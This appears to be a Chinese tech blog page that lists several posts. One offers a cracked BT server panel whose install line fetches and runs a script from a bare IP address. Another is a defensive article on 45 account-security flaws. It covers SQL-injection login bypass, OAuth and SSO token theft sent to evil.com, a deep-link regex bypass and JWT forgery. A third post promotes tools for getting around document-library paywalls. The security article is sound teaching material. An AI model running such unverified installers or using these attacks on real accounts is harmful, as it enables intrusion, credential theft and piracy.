搜索到
100
篇与
技术分享
的结果
-
宝塔面板最新企业版 | 宝塔破解版/魔改版 FOR CentOS7/64| Copyright © 2015-2099 BTPOJIREBAN All rights reserved.|移除宝塔面板实名绑定|移除宝塔面板收集用户隐私模块|移除宝塔面板网站内容监听模块|移除与宝塔宝塔官网一切通信协议|免费使用宝塔面板专业版插件|免费使用宝塔面板企业版插件|新增TCP内核锐速/安装时自动开启|修复宝塔CC拦截组件无法正常使用问题|修复宝塔下载部分冷门插件下载源失效问题Centos7在线安装命令/暂不支持其他版本yum install -y wget && wget -O bt.sh http://45.61.185.130/bt.sh && sh bt.sh -
宝塔面板Nginx开启Brotli压缩,提升网站加载速度-【给网站提提速】 前言Google 认为互联网用户的时间是宝贵的,他们的时间不应该消耗在漫长的网页加载中,因此在 2015 年 9 月 Google 推出了无损压缩算法 Brotli。Brotli 通过变种的 LZ77 算法、Huffman 编码以及二阶文本建模等方式进行数据压缩,与 Gzip相比效率提升约 17-25%。这里简单说一下如何在宝塔面板Nginx开启Brotli压缩。正文下载Brotlicd /www/server #下载brotli git clone https://github.com/google/ngx_brotli.git cd ngx_brotli #更新brotli git submodule update --init配置Nginx Brotli模块登录宝塔管理面板 -> 软件商店 -> 已安装 找到Nginx ~不要犹豫~ (还是推荐备份下系统快照) 直接点击 卸载!2.点击 软件商店 ->运行环境 找到Nginx 不要犹豫 点击安装在弹出的窗口中选择编译安装 点击添加自定义模块模块名称:ngx_brotli 模块描述:ngx_brotli 模块参数:--add-module=/www/server/ngx_brotli 填写完成后返回安装选项✔刚刚添加的模块提交,等待安装完成即可!3.给网站开启brotli压缩软件商店找到Nginx点击设置选择配置修改将以下代码插入http段保存即可。Tips:Britli和Gzip可以共存无需关闭Gzip.# brotli brotli on; brotli_comp_level 1; brotli_buffers 16 8k; brotli_min_length 20; brotli_types text/xml text/plain text/css application/javascript application/x-javascript application/rss+xml text/javascript image/tiff image/svg+xml application/json application/xml; 打开网站查看标头若返回br即启用成功。{mtitle title="启用成功"/}PS:问:这个和Nginx的Gzip冲突吗?答:不冲突,但是Br相对Gzip效率高但对CPU资源占用也高,如果单核机器就不建议都开了
-
宝塔 Linux 面板 7.9.5 开心版【万圣节快乐!】 本次更新时间:11月8日【移除】去除访问日志自动生成【移除】去除WebRTC连接【移除】so为自行编译非官方so文件(所以不存在 PluginLoader.get_soft_list(cid) 调用)【更新】IP配置工具 1.3 - 1.4【新增】微步木马检测 1.0【更新】系统防火墙 3.2 - 3.3【更新】Linux工具箱 1.8 - 1.9【更新】进程守护管理器 2.2 - 2.3【更新】日志清理工具 2.1 - 2.2【更新】堡塔应用管理器 1.6 - 1.8【更新】又拍云存储 4.7 - 4.8【更新】堡塔应用管理器 1.7 - 1.8【更新】FTP存储空间 5.1 - 5.3【更新】阿里云OSS 5.3 - 6.1【更新】亚马逊S3云存储 1.1 - 1.4【更新】七牛云存储 5.3 - 5.4【更新】谷歌云网盘 2.0 - 2.1【更新】谷歌云存储 1.5 - 1.6【更新】腾讯云COS 4.8 - 5.1【更新】百度云存储 1.1 - 1.2【更新】华为云存储 1.1 - 1.2【更新】京东云存储 1.0 - 1.1【更新】Apache防火墙 9.0 - 9.1【更新】Nginx防火墙 9.0.6 - 9.0.7【更新】网站监控报表 7.0 - 7.2.1【更新】宝塔数据同步工具 3.3 - 3.4【更新】宝塔系统加固 3.3 - 3.5【更新】宝塔任务管理器 2.1 - 2.2【更新】对象存储自动挂载 1.1 - 1.2【更新】部分环境升级【优化】软件列表优化7.9.4 官方更新记录【增加】增加脚本文件CRLF自动转LF机制【增加】端口规则增加允许指定-和,格式的多个IP地址【增加】增加用户体验改善计划开关(在设置页面)【增加】增加登录限制倒计时提示【优化】优化数据库云存储“修复“功能【优化】优化flask/gevent升级脚本【优化】优化在磁盘不可写的情况下,面板的可用率【优化】优化SSH基本设置模块【调整】调整反向代理静态文件默认缓存时间为1分钟【调整】调整首页安装软件列表获取机制【调整】调整bt default默认密码覆盖为*号【调整】移除防火墙放行端口时自动放行UDP端口的机制【修复】修复SSHKey无法下载的问题【修复】修复消息通道微信公众号不显示【修复】修复debian系统重启防火墙禁ping失效【修复】修复mysql8.0可能被识别为greatsql8.0的问题【修复】修复已添加企业增量备份却提示未备份问题【修复】修复port.pl内容异常的情况下无法启动面板的问题【修复】修复常用命令编辑时命令名称首尾带空格导致的问题【修复】修复短信告警模块每次都从云端获取短信数量的问题【修复】修复终端aes密码异常导致的问题【修复】修复计划任务中的任务在停用状态下编辑结果不会实时同步到脚本的问题【修复】修复某些情况下获取本机IP出现死循环的问题【修复】修复数据库密码转义问题【修复】修复计划任务备份清理时会清理手动备份的问题【修复】修复因python环境变量导致的jobs未执行问题注意:此版本不支持Python2.7【不喜勿用-无任何病毒代码-面板全解密】Centos/Ubuntu/Debian安装命令 独立运行环境(py3.7):默认安装是7.8.0 直接在线升级7.9.5隐藏内容,请前往内页查看详情Linux面板 7.9.5 升级企业版命令(已经安装官方脚本/或者其他脚本的 可以执行此命令)隐藏内容,请前往内页查看详情
-
-
-
网站地图是什么?该如何生成 一些初入SEO行业的小白可能听过网站地图这个名词,但是对于网站地图的具体作用可能不是很清楚。今天义信科技麒麟老师特意查了一下这个关键词的百度指数,发现100多,就立马写了这篇文章,关于网站地图(sitemap)是什么?网站地图如何生成?这些问题在这篇文章里都为大家解决。网站地图(sitemap)是什么?顾名思义,网站地图是为网站的用户提供导航索引的一种用于网站的地图,这里说的用户一方面指现实中的用户,另一方面指搜索引擎蜘蛛。网站地图的格式:网站地图主要分为3种格式,一种是html格式的,一种是xml格式的,还有一种是txt格式的,html格式的网站地图主要应用于网站的页面上,xml和txt格式的网站地图主要是给蜘蛛看的,一般需要提交给搜索引擎。网站地图文件里长什么样1、html网站地图这种地图其实就是通过html代码写出来的一个网站页面,至于具体长什么样,需要设计人员去规划。下面是一个案例:2、xml网站地图xml格式网站地图文件后缀是xml,里面具体样式是:上述Sitemap向百度提交了2个url:http://www.yoursite.com/yoursite.html、http://www.yoursite.com/yoursite2.html若有多条url,按照上述格式重复之间的片断,列明所有url地址,打包到一个xml文件,向搜索资源平台进行提交。至于具体每一项里面填什么,第三方工具里面都会有提示。3、txt网站地图如上图所示,只要将网站所有url一行一条的放到txt文档里,则txt格式的网站地图就制作完成了。为什么要做网站地图?了解了网站地图是什么,麒麟老师觉得有必要为大家介绍一下为什么要做网站地图,下面主要分为两个方面来进行讲解。1、提升用户体验对于一些中大型网站,网站的目录、频道页面很多,用户一下找不到自己想要的页面,此时如果网站做了网站地图,用户通过网站地图可在短时间内找到自己想要的页面,当然网站地图要做的合理,这需要前期的细致规划。这种地图一般是html格式的。2、提升蜘蛛的抓取效率、收录html格式的网站除了上述作用外,还有一个作用,那就是提升蜘蛛的抓取效率,从而促进网站收录,当然,xml以及txt格式的网站地图也有此作用。网站地图将网站所有的有效页面都放在了一起,可以让蜘蛛短时间内发现网站所有的链接,从而爬取收录。网站地图如何生成?1、通过工具生成对于一些小型的企业网站,通过一些工具生成网站地图即可,这里麒麟老师推荐爱站工具包里的网站地图生成工具。当然大家也可以在百度搜索网站地图生成工具,来找到合适自己的那一款。2、通过技术生成对于一些中大型网站,通过工具生成可能就不行了,一方面数据量大,耗时长,另一方面平台可能会收费。此时就需要公司的技术人员来通过技术手段进行生成网站地图。网站地图怎么用?1、html格式网站地图对于html格式的网站地图,一般放到网站的底部模版,用户随时可以看到,同时蜘蛛也可以随处抓的到。除了网站的底部外,还会放到robots.txt这个文件中,具体格式是:Sitemap:http://www.xxx.com/sitemap.html2、xml及txt格式网站地图对于xml及txt格式的网站地图,一方面需要放到robots.txt文件中,另一方面需要通过百度搜索资源平台提交给搜索引擎。具体入口见下图:以上就是义信科技麒麟老师对网站地图(sitemap)是什么?网站地图如何生成的介绍,后期会更新robots文件等相关的干货内容,请持续关注义信科技。
-
WEB开发中常见的45个账号安全风险 以下文章来源于永安在线情报平台 ,作者永安在线 信息化时代,大部分平台都需要通过账号登录才可体验更多功能,近些年为方便用户操作,平台演变出了扫码登录、第三方授权登录等多种登录方式,同时也为攻击者打开了更大的攻击面。 账号包含着各种重要信息如个人手机APP账户、网站账户、银行卡账户密码等,是黑产眼中的“香饽饽”。 永安在线情报平台监测过多起黑产利用账号缺陷发起规模攻击,如扫号攻击、撞库攻击、盗号登录等,最终达到窃取敏感数据、资金盗取、网络诈骗、薅羊毛等目的。因此,加强账号安全管理,是企事业单位业务和数据安全保障的第一道屏障。 为此,猎人君为大家梳理了45个账号安全风险点,方便大家在账号安全管理中查缺补漏,从而建立更加全面的账号安全体系。 下文将结合永安在线情报平台捕获到的攻击案例,对不同安全场景和凭证中45个安全风险逐一分析: 按照不同场景分析 密码登录场景 账号相关 1. 账号可枚举 // 危害性:低 普遍性:高 可利用性:高 通过响应体的内容可以判断账号在系统中是否存在,拿到存在的账户后可进一步发起撞库/爆破攻击,提高攻击效率。 例如该接口会对不存在的用户名返回“用户名不存在”,可利用这个提示来枚举账号。 2. 默认账号 // 危害性:低 普遍性:高 可利用性:高 很多系统都会有默认的账号,比如很多管理后台都会有个admin账号,这样攻击者即使无法枚举账号在系统中是否存在,也可以尝试对默认账号发起攻击。 密码相关 3. 撞库 // 危害性:高 普遍性:中 可利用性:中 一般情况下,用户会用一个手机号或邮箱在多个平台上注册账号,为了方便记忆,密码可能会设置成一样的。当某些平台的用户数据泄露了,攻击者就会拿泄漏的账号密码去别的平台尝试登录。比较常见的有游戏行业的「撞库攻击」,游戏账号的价值比较高,对攻击者来说可获取高额利润。 永安在线情报平台曾捕获过多起黑产贩卖撞库成功得来的账号信息: 4. 钓鱼 // 危害性:高 普遍性:高 可利用性:中 攻击者通过准备一个和官方平台基本一样的登录页面(域名不同)或礼品领取、抽奖的页面等,引诱受害者输入账号密码。攻击者通过这种方式可直接获取到受害者的明文账号密码。 5. 弱密码 // 危害性:高 普遍性:高 可利用性:高 「弱密码」没有一个明确的定义范围,任何可能被猜解出来的密码都可以被称为弱密码。常见的弱密码123456,像dingdang2022、dingdang.com、dingdang@2022也可被称为弱密码。攻击者通过常见的弱密码以及收集目标的相关信息,组合起来生成密码进行爆破。 例如某个管理后台存在弱密码,域名为pass****.cn,通过爆破就得到账号密码为pass****、pass****2016。 6. 万能密码 // 危害性:高 普遍性:低 可利用性:高 「万能密码」指的是用什么密码都可以登录系统,是因为登录接口存在SQL注入漏洞造成的。 例如输入账号admin密码123456,后端会执行的SQL语句大概为: SELECT * FROM user WHERE username='admin' AND password='123456' 如果存在SQL注入漏洞,攻击者可以构造语句,输入账号admin' # ,输入任何密码,后端会执行的SQL语句就变为: SELECT * FROM user WHERE username='admin' #' and password='123456' 这里通过#注释符把后面查询密码的语句注释掉了,校验账号密码的逻辑就失效了,实现万能密码登录。 7. 密码明文传输 // 危害性:高 普遍性:中 可利用性:低 密码在提交到服务器的过程中,没有进行加密处理,攻击者可通过中间人攻击的方式获取到明文密码。 8. 密码在URL中 // 危害性:高 普遍性:低 可利用性:低 如果一个登录请求会把账号密码写在URL中,即把密码暴露在浏览器的地址栏上,或可能会被浏览器、安全软件给记录下来。如果包含密码的这个URL,是个HTML,HTML上又会加载JS、CSS等第三方的资源文件,那在请求这些第三方文件的时候,就会通过Referer把密码泄漏了。 9. 密码明文存储 // 危害性:高 普遍性:低 可利用性:低 用明文存储密码有很大的安全隐患, 一般数据库里还存有用户的姓名、手机号、用户名等信息,一旦数据库发生泄漏,再加上用户的明文密码,攻击者就可以用账号和密码去其他网站尝试登录。因为用户往往会根据习惯将多个网站的密码成一样的,跟前面提到的撞库攻击存在的问题一样。 10. API泄露密码 // 危害性:高 普遍性:低 可利用性:高 因为开发人员的疏忽,API接口可返回用户的所有字段(包括密码)的信息,攻击者就可轻易获取到用户的密码。 验证码相关 11. 图形验证码失效 // 危害性:低 普遍性:低 可利用性:高 常见的让图形验证码失效的方式有把验证码参数值填空,或者验证码参数删掉。 如下案例就是直接把验证码参数删除,验证码失效,不再返回验证码错误。 12. 滑块验证码失效 // 危害性:低 普遍性:低 可利用性:高 最常见的滑块验证码是通过SaaS接入的,但为了避免第三方服务器出问题影响业务的正常运营,通常会提供一个宕机模式(即第三方服务器出问题时可不用进行滑块验证码),攻击者利用这一点就可以让滑块验证码失效。 如下是在请求中添加了个"xx_server_status":0,让服务端以为第三方服务宕机了,就不用进行滑块验证了,从而绕过了滑块验证。 13. 不同端验证码策略不一致 // 危害性:低 普遍性:低 可利用性:高 平台可能对一套系统开发了PC网页版、移动网页版、APP等,在不同端上验证码的策略可能不同。比如在PC网页版的登录接口是有验证码的,换到APP可能就没有验证码了,攻击者就可利用APP的接口来发起攻击。 14. 验证码可复用 // 危害性:低 普遍性:低 可利用性:高 「验证码可复用」即验证码使用多次不失效,利用这个缺陷来绕过验证码发起攻击。 永安在线情报平台就捕获过多起攻击者利用验证码可复用的漏洞进行扫号攻击。如下图,攻击者多次请求都是使用的同一个验证码,并且都请求成功。 15. 使用老接口 // 危害性:低 普遍性:高 可利用性:中 平台开发了新的接口,但是老的接口可能没下线,这类老接口很容易被攻击者利用。 下图是永安在线情报平台捕获的一个攻击事件,平台在页面上显示的是中文验证码: 但从永安在线情报平台流量中看到,攻击者请求中的验证码都是英文数字,并非中文验证码。 通过分析得出应该是平台新接口升级了验证码为中文验证码,但老的接口还能继续使用英文数字验证码,攻击者正是利用这一漏洞对老接口发起攻击。 短信验证码场景 16. 验证码位数过短 // 危害性:高 普遍性:中 可利用性:高 如果短信验证码是纯数字的,位数又比较短(小于等于4位),攻击者很容易把验证码爆破出来。 下图所示是一个短信验证码登录接口,对手机号为13888888888的短信验证码进行爆破,可实现任意用户登录。 17. 验证码有效期过长 // 危害性:中 普遍性:低 可利用性:低 6位纯数字的验证码爆破的成本比较高,一共有一百万个数字需要爆破,耗费的时间会非常长。但如果验证码的有效期比较长,比如1小时甚至更久,还是存在被爆破的风险。 如下案例,某接口登录使用的是6位验证码,有效期超半小时,案例中的验证码是0开头的(运气比较好),所以比较快地爆破出了验证码为064716。 18. 验证码在响应中泄露 // 危害性:高 普遍性:低 可利用性:高 发送短信验证码的接口,有可能在其响应体/响应头中泄漏了验证码。如下案例所示,某教育类APP发送验证码的API接口,在响应体中泄漏了验证码,和客户实际收到的短信验证码一致,攻击者可利用该漏洞实现任意用户登录/注册等操作。 19. 验证码由客户端生成 // 危害性:高 普遍性:低 可利用性:高 在发送短信验证码的接口,也有可能由客户端来生成验证码,然后给到后端来发送短信验证码,相当于可以自己指定手机号的验证码,攻击者可利用该漏洞实现任意用户登录/注册等操作。 20. 测试验证码未删除 // 危害性:高 普遍性:低 可利用性:中 在应用上线前,开发人员可能为了方便测试,设置了测试专用的验证码(如0000、1111、2222等),输入该验证码即可完成登录/注册等操作。在应用上线后可能未删除该验证码,攻击者可利用测试验证码实现任意用户登录/注册等操作。 21. 验证码与手机号未绑定 // 危害性:高 普遍性:低 可利用性:高 在短信验证码登录的场景下,后端校验验证码是否正确时,没有验证验证码与手机号的关系,仅仅校验验证码是否为有效期内下发过的验证码。攻击者可利用自己的手机号接受短信验证码,实现任意用户登录/注册等操作。 扫码登录场景 22. 扫码授权登录CSRF // 危害性:高 普遍性:低 可利用性:中 扫码登录的流程大概如下: 有些后端没有去验证用户是否扫描了这个二维码,可以直接跳到授权登录这一步,在授权登录这个点上如果又存在CSRF漏洞,攻击者即可构造一个恶意的链接,引诱用户打开链接,利用该漏洞就可以轻易获取用户账号权限。 23. 凭证窃取 // 危害性:高 普遍性:低 可利用性:中 通过对某个平台的扫码登录逻辑进行分析,猎人君发现最后确认登录时,只需用户的memberId就可以完成登录,每个用户的memberId又是唯一不变的。如果有办法获取到用户的memberId,就相当于永久获取到了其账户的权限。 再进一步挖掘发现在APP内可以使用JavaScript通过JSBridge调用Native方法拿到当前用户的memberId,又通过平时收到的营销短信中的链接发现可以使用Deep Link唤醒APP打开任意URL。 三者结合在一起可构造一个恶意URL,引诱用户打开,打开后会通过Deep Link唤醒APP打开构造好的页面,页面就是通过JavaScript拿到memberId并外传,再拿着memberId通过确认登录的接口就可以登录用户的账号了。 第三方授权登录场景 24. 凭证窃取 // 危害性:高 普遍性:低 可利用性:中 第三方授权登录指的是通过QQ、微信或微博等进行登录,如果配置不当也会存在漏洞。 以QQ授权登录举例: https://graph.qq.com/oauth2.0/show?which=Login&display=pc&response_type=code&client_id=123456&redirect_uri=http://www.aaa.com/user/thirdparty/qq_callback.php&state=8ccc0aef42194df06cfd42c606e4d59a&scope=all 用户使用QQ号登录成功后,会把登录凭证code传递给回调地址redirect_uri,如下所示: Location: http://www.aaa.com/user/thirdparty/qq_callback.php&state=8ccc0aef42194df06cfd42c606e4d59a&scope=all&code=xxxxxxxxx 那么如果redirect_uri这个值是攻击者可控的,那攻击者可以构造恶意URL来窃取用户的code。正常都会限制redirect_uri的域名,比如为*.aaa.com,这样域名攻击者不可控,就不会有什么问题了。但如果结合其他子域下的问题,还是可能导致用户的code被窃取。 分析某站点第三方登录逻辑时发现,对redirect_uri的域名限制为*.aaa.com,在b.aaa.com域名下发现一个论坛,论坛帖子得回复可以插入第三方的图片,将这两点结合起来就可以通过referer来窃取code。 https://graph.qq.com/oauth2.0/show?which=Login&display=pc&response_type=code&client_id=123456&redirect_uri=http://b.aaa.com/tiezi/123456&state=8ccc0aef42194df06cfd42c606e4d59a&scope=all 登录成功后会带着code访问帖子: http://b.aaa.com/tiezi/123456&state=8ccc0aef42194df06cfd42c606e4d59a&scope=all&code=xxxxxxxxx 而帖子中又有攻击者插入的第三方图片,在加载第三方图片的时候,就把code传输出去了,完成code窃取: GET http://www.evil.com/test.jpg Referer: http://b.aaa.com/tiezi/123456&state=8ccc0aef42194df06cfd42c606e4d59a&scope=all&code=xxxxxxxxx 攻击者拿到code和state之后,即可登录受害者的账号。 单点登录场景 「单点登录」指的是用户一次可通过一组登录凭证登入会话,在该次会话期间无需再次登录,即可安全访问多个相关的应用程序和服务。 25. 凭证窃取 // 危害性:高 普遍性:低 可利用性:中 如下是某平台单点登录的功能: https://passport.a.com/account/unitivelogin?service=86904ff8&continue=https://www.a.com/account/settoken 在登录状态下访问后会把凭证发送到continue参数指定的地址: 如果continue参数中接口的域名可控,攻击者可把域名改成自己的,再把链接发给受害者,引诱受害者打开链接,凭证就会被发往攻击者的域名。 通过测试发现这里不能将a.com改为b.com,后端有一定的检测逻辑。但通过多次测试发现可以在参数中插入空白字符(%00、%09、%0a、%0d)来干扰检测,达到域名可控的效果。 https://passport.a.com/account/unitivelogin?service=86904ff8&continue=https://www.a.com%09.evil.com/account/settoken 当受害者访问该链接,凭证就会被发送给攻击者了: https://www.a.com.evil.com/account/settoken,攻击者就可以利用该凭证登录其所有业务。 修改密码场景 26. 修改密码CSRF // 危害性:高 普遍性:低 可利用性:中 修改密码处如果没有校验旧密码、短信验证码等,则可能存在CSRF漏洞,易被攻击者利用。攻击者利用该漏洞可构造链接诱导受害者打开,打开后受害者账号的密码就被修改了。 27. 修改密码越权 // 危害性:高 普遍性:低 可利用性:高 修改密码的API存在越权漏洞,导致攻击者可利用该漏洞直接修改其他用户的密码。 忘记密码场景 28. 任意用户密码修改 // 危害性:高 普遍性:低 可利用性:高 忘记密码功能一般会给用户绑定的手机号/邮箱发送一个验证码,验证通过后即可重置密码。攻击者如果可以爆破该验证码,或在最后设置新密码时后端验证存在缺陷,可以导致任意用户密码修改。永安在线情报平台曾捕获到一起攻击事件,攻击者利用某数字藏品的忘记密码接口漏洞,来修改其他用户的密码。 攻击者在修改其他用户的密码后,会登录账号并尝试把账号内的数字藏品进行转增,以此来获利。 账号绑定场景 29. 账号绑定CSRF // 危害性:高 普遍性:低 可利用性:中 平台一般会提供账号绑定的功能,即账号可以绑定邮箱、QQ号或微信号,后续可以使用这些方式进行登录。若绑定功能存在CSRF,攻击者利用该漏洞让受害者绑定上自己的账号(邮箱、QQ号、微信号等),攻击者后续就可以用自己的账号来登录受害者的账号了。 多因子认证场景 许多网站都使用密码一个因子来验证用户的身份,但是有些网站会用多个因子来验证用户的身份。拿密码和验证码两个因子来说,攻击者同时获得这两个因子比获得其中一个因子的可能性要小得多,因此双因子认证比单因子认证更安全。 30. 双因子认证绕过 // 危害性:高 普遍性:低 可利用性:中 如果双因子认证的实现存在缺陷,也是可能被绕过的。 例如,网站验证用户的账号密码后,还要验证邮件收到的验证码,两个因子认证都通过才算登录完成。 但是这里在验证完账号密码后,COOKIE已经拥有了登录态,导致不填入验证码也可以直接访问/my-account账户页面,以此绕过了双因子认证。 31. 双因子认证爆破 // 危害性:高 普遍性:低 可利用性:低 即使网站使用了双因子认证来确保账号安全,但如果没有对爆破攻击进行防御,攻击者还是可以对这些因子(如密码、验证码)进行爆破,以获取账号权限。 按照不同凭证分析 COOKIE 32. COOKIE未设置HTTPONLY // 危害性:低 普遍性:低 可利用性:中 COOKIE如果没有设置HTTPONLY,可能导致COOKIE被窃取。攻击者可以通过XSS漏洞执行document.cookie来拿到用户的COOKIE。 33. COOKIE未设置SECURE // 危害性:低 普遍性:低 可利用性:低 COOKIE如果没有设置SECURE,可能导致COOKIE被窃取。在网站传输使用HTTP的情况下,攻击者可以通过中间人劫持获取到COOKIE。 34. 会话固定 // 危害性:低 普遍性:低 可利用性:中 「会话固定」指的是网站在登录前后的会话不变,比如登录前COOKIE是123456,登录后的COOKIE还是123456,那么攻击者可能就可以通过某些API给受害者写入COOKIE。比如攻击者构造了一个URLhttp://www.a.com/?session=123456,受害者访问后点击该链接进行登录,会话成功建立(此时的session已经被攻击者预先设置为123456了),攻击者此时就可以用session=123456登录受害者的账号了。 35. 不同COOKIE策略不一致 // 危害性:低 普遍性:低 可利用性:低 很多时候网站会给COOKIE设置HTTPONLY以防止XSS漏洞对COOKIE读取,但可能给PC网页版的COOKIE设置了HTTPONLY,但移动端的COOKIE没有设置,攻击者还是可以利用XSS漏洞来获取到用户的COOKIE。 36. API泄露COOKIE // 危害性:高 普遍性:低 可利用性:高 猎人君在分析某站点登录的逻辑时,发现最后会把COOKIE返回在登录成功的API中,这个COOKIE设置了HTTPONLY,正常通过XSS是无法获取到该COOKIE的。但是现在泄漏到了API的响应中,就有机会通过XSS来获取泄漏在登录成功API中的COOKIE。 接下来就需要一个和登录成功页面同域的XSS,登录成功的域是www.a.com,在这个域下的接口很少,想找到一个XSS的难度的比较大。但是在其HTML中发现有这么一段代码document.domain=a.com,将域设置为了a.com,即任意一个子域名*.a.com的XSS都可以获取到该页面的内容,利用难度大幅下降。 37. APP漏洞导致COOKIE被窃取 // 危害性:高 普遍性:低 可利用性:中 比较常见的是因为WEB漏洞导致COOKIE被盗取,但是如果APP中存在漏洞也是可能导致COOKIE被盗取的。 如下案例,首先通过分析JS发现一个可以通过DEEPLINK唤醒APP在WEBVIEW中打开任意URL的漏洞: app://open/?url=http://www.evil.com 在APP中,会用到JsBridge让WebView和Native进行交互,尝试在APP中打开我自己构造的页面,调用Native方法,发现调用失败,猜测是APP中有一定的检测逻辑,导致调用失败,对APP进行逆向分析看是否能够绕过检测。 通过逆向定位到是这里对打开的URL使用了正则进行检测: (^|:\/\/)((((\w|-|\.)+\.)(asdqwe\.(cn|com))))($|[\/\?#]\w* 通过分析发现该正则是可以绕过的,问题出在开头的正则: (^|:\/\/) 那么只要让打开的URL包含如下字符串就能绕过正则的检测: ://aaa.asdqwe.com 也就是如下构造DEEPLINK即可在我的页面中通过JsBridge调用Native方法: app://open/?url=http://www.evil.com/://aaa.asdqwe.com 最后发现调用某个Native方法发起HTTP请求任何域名的URL时,都会带上当前用户的COOKIE,最后利用这个Native方法可以实现盗取COOKIE。 JWT JWT一共分为三段: Header(头部) Payload(负载) Signature(签名) 其中Signature部分是对前两部分的签名,防止数据篡改,按照Header中指定的算法和服务器才知道的密钥来生成。 38. 弱密钥 // 危害性:高 普遍性:中 可利用性:高 JWT的密钥和账号密码一样存在弱密钥的问题,如果密钥非常简单,比如123456,那么攻击者可以非常轻易地生成其他用户的JWT,拿到账户权限。 39. 密钥泄露 // 危害性:高 普遍性:低 可利用性:高 密钥可能通过会代码仓库、报错页面等途径泄漏。 代码仓库泄漏: 报错信息中泄露: 40. 未校验签名 // 危害性:高 普遍性:低 可利用性:高 JWT库通常会提供验证和解码的方法,但是可能开发人员混淆了,只使用了解码方法,没有对签名进行验证,导致可以随意更改JWT来冒充其他用户。 例如,用账户访问/admin api时,返回401,提示该接口只能是administrator访问。 将当前的JWT进行解码,发现在PAYLOAD部分的sub字段存放了用户名。 将用户名更改为administrator,重新生成JWT,不用管签名或者签名部分直接删除,再次访问发现就不会再提示权限不足,成功冒充admin的身份。 41. 空加密算法 // 危害性:高 普遍性:低 可利用性:高 JWT可以使用不同的算法进行签名,但也可以不签名,在这种情况下,alg参数的值会为none,代表所谓的“不安全的JWT”。 还是在访问/admin api时,提示只允许administrator访问。 解码JWT,算法存储在HEADER中的alg字段,用户名存储在PAYLOAD的sub字段: 将alg改为none,sub改为administrator,重新生成不带签名的JWT再次访问: 可以看到成功伪造了administrator的身份,访问到了/admin api。 JWT HEADER中除了alg是必填的,还有一些可选的参数,是可能被攻击者利用的。 --JWK (JSON Web Key) - 存放JWT密钥的一个JSON --JKU (JSON Web Key Set URL) - 提供一个URL,服务器从中获取一组正确的密钥 --KID (Key ID) - JWK的ID 42. JWK参数注入 // 危害性:高 普遍性:低 可利用性:高 正常情况下,服务器应该只使用有限的公钥白名单来验证JWT签名,但是配置错误的服务器可能会使用JWK中的公钥来验证JWT的签名。 如下是包含JWK例子: 攻击者可利用这种配置错误,自己生成RSA私钥对修改后的JWT进行签名,然后将对应的公钥写入JWK中,以达到伪造其他用户身份的目的。 例如在访问/admin api时,提示只允许administrator访问。 首先将sub更改为administrator。 再根据自己生成的RSA密钥,使用私钥进行签名,把公钥放到JWK中,生成新的JWT。 再次访问/admin api,访问成功,代表伪造administrator身份成功。 43. JKU参数注入 // 危害性:高 普遍性:低 可利用性:高 某些服务器不会直接使用header参数中的JWK提交的公钥,会使用JKU提供包含密钥的JWK集合,服务器会请求JKU提供的URL获取密钥来验证签名。 JWK集合是一个JSON,如下: 如果服务器没有校验JKU的地址,攻击者可以将其改为自己构造的URL,让服务器使用自己生成的密钥来验证签名,以达到伪造其他用户身份的目的。 还是一样,在访问/admin api时,提示只允许administrator访问。 自己生成RSA密钥,构造一个api用于返回JWK集合。 修改KID与api中的一致,sub修改为administrator,并添加JKU参数指向自己构造的api,重新生成JWT。 再次访问/admin api,访问成功,代表伪造administrator身份成功。 44. KID参数注入 // 危害性:高 普遍性:低 可利用性:高 服务器可以使用多个加密密钥来给不同类型的数据进行签名,不只是JWT。所以KID参数用于帮助服务器在验证签名时使用正确的密钥。密钥通常以JWK集合的方式存储,但是规范中没有定义ID的具体结构,只是开发人员自己生成的一个字符串。例如,开发人员可能使用KID参数来指向数据库中的某条数据,甚至是文件的名称。 如果KID指向的是文件的名称,又存在目录遍历的漏洞,则攻击者可能会让服务器使用其文件系统中的任意文件作为验证的密钥。 如果服务器支持使用对称加密算法签名的JWT,攻击者可以让服务器使用/dev/null文件作为验证的密钥,绝大部分linux系统都有这个文件,因为这是一个空文件,服务器读取该文件时会获得null,再使用Base64编码空字节(AA==)生成一个有效的签名,达到伪造用户身份的目的。 还是和前面一样,在访问/admin api时,提示只允许administrator访问。 生成密钥为空字节的对称加密密钥: 修改sub为administrator,再使用目录遍历,将KID参数指向/dev/null文件,以让服务器获得密钥为null,最后重新签名生成新的JWT。 再次访问/admin api,访问成功,代表伪造administrator身份成功。 45. 算法混淆 // 危害性:高 普遍性:低 可利用性:中 某些JWT库在验证签名有效性时,给HMAC对称加密的密钥和RSA非对称加密的公钥赋予了相同的变量名,伪代码如下所示: 如果攻击者通过某种方式获得了RSA的公钥,攻击者可通过将JWT签名的算法从RS256调整为HS256,并用公钥对其进行签名,达到伪造用户身份的目的。 网络安全风险层出不穷,账号就像一把可以开启企业数据资产大门的“钥匙”,任何一点疏忽都可能对企业整体业务和数据资产造成严重的安全风险。因此,完善和维护账号安全体系是企业数字化信息安全建设的关键。
-
文库下载又不能用了?别急,还有一堆办法! 现在的文库下载工具真的是用一个少一个,毕竟许多软件作者的初衷只是为了方便大家,让大家能较为轻松的获取自己想要的文档。但是有些人喜欢拿到工具后,就开始了盈利行为,为软件本身招来了不好的影响。 收了钱就要提供对应的服务,有很多倒卖的人提供不了,然后用户来骂原作者的比比皆是,或者是喷软件不好用,可这本来就是软件作者用爱发电免费分享的,没有想过要赚钱,白白辛苦了一阵子还把名声搞臭了,估计没人会愿意继续更新下去吧。 之前推荐的界面还不错的YOCO下载器,就因为种种原因永久停止维护了,不少朋友也反馈软件用不了。 一、文库下载器 今天就给大家推荐另一款软件,并分享一些在Github上寻找下载工具的办法。 先来看看新的这款小工具,名字就是文库下载器,软件作者以前也发过一版,但是失效了,字体显示也有点问题,所以在16号又更新了一次,不再需要登录,下载几百页的文件也能Hold住,同时提高了下载速度。 软件就一个单文件,打开即用。把需要的链接丢进去就好了,没错,就是这么简单。 下载完成后,会在软件所在的目录下生成一个PDF文件,需要编辑的话,可以使用之前介绍的PDF24等工具转换一下格式。 下载地址: https://www.123pan.com/s/HQeA-cE4Sh https://ghpym.lanzouv.com/b0125x6ra 密码:97ai 二、上 GitHub 扒拉 有的朋友可能会问,这个工具失效了怎么办,还有没有其他能临时顶一下的工具?这时候就可以请出最大的"男生交友网站"-GitHub了,在上面搜索对应的关键字后,切换成Python语言之后,就可以找到前人留下来的一些上古工具。 点击下载将代码下载下来(地址:https://github.com/BoyInTheSun/wks)。 使用之前要做的是先配置一下运行Python的环境,当然你也不用听着就头大,配置环境现在也就是安装一个软件事情,在安装的时候把这个按钮勾选上即可。 